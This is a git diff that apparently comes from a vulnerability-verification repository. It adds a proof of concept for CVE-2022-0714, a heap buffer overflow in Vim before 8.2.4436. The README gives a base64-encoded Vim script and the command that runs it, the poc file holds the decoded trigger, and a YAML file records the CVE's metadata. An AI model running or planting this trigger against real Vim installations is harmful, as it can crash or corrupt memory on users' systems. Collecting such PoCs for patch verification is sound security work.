diff --git a/cve/vim/2022/CVE-2022-0714/README.md b/cve/vim/2022/CVE-2022-0714/README.md new file mode 100644 index 0000000000000000000000000000000000000000..0d9bac53722cff2b5f6b7da60119644c0e259720 --- /dev/null +++ b/cve/vim/2022/CVE-2022-0714/README.md @@ -0,0 +1,6 @@ +### 漏洞验证 +```shell +$ echo -ne "c2UgZW5jb2Rpbmc9aXNvODg1OQpub3JtOnNlIAEbCnNlIHZhcnRhYnN0b3A9NDAwCm5vcm0waTAwCQQ=" | base64 -d > poc +$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!" +``` +![](./png/CVE-2022-0714.png) \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-0714/png/CVE-2022-0714.png b/cve/vim/2022/CVE-2022-0714/png/CVE-2022-0714.png new file mode 100644 index 0000000000000000000000000000000000000000..45d9444efdd57c77aac854f72f242124af038588 Binary files /dev/null and b/cve/vim/2022/CVE-2022-0714/png/CVE-2022-0714.png differ diff --git a/cve/vim/2022/CVE-2022-0714/poc b/cve/vim/2022/CVE-2022-0714/poc new file mode 100644 index 0000000000000000000000000000000000000000..f030eb9e0820a42c756592f170594ecb0412e1ca --- /dev/null +++ b/cve/vim/2022/CVE-2022-0714/poc @@ -0,0 +1,4 @@ +se encoding=iso8859 +norm:se  +se vartabstop=400 +norm0i00  \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0714.yaml b/cve/vim/2022/yaml/CVE-2022-0714.yaml new file mode 100644 index 0000000000000000000000000000000000000000..b9f11b5fb02f6d77e153757919e621fef4ccc495 --- /dev/null +++ b/cve/vim/2022/yaml/CVE-2022-0714.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-0714 +source: https://huntr.dev/bounties/db70e8db-f309-4f3c-986c-e69d2415c3b3/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: medium + description: | + Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.4436. + scope-of-influence: + vim < 8.2.4436 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0714 + - https://github.com/vim/vim/commit/4e889f98e95ac05d7c8bd3ee933ab4d47820fdfa + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2022-0714 + cwe-id: CWE-787,CWE-122 + cnvd-id: None + kve-id: None + tags: cve2022,缓冲区错误 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 22091161e0325a6d4c1de08a198cdb7af3f6192d..b25c77926213d712ba8121da5a1bc744e3899933 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -30,6 +30,7 @@ cve: - CVE-2022-0572 - CVE-2022-0629 - CVE-2022-0685 + - CVE-2022-0714 - CVE-2022-0729 openssh: - CVE-2022-1292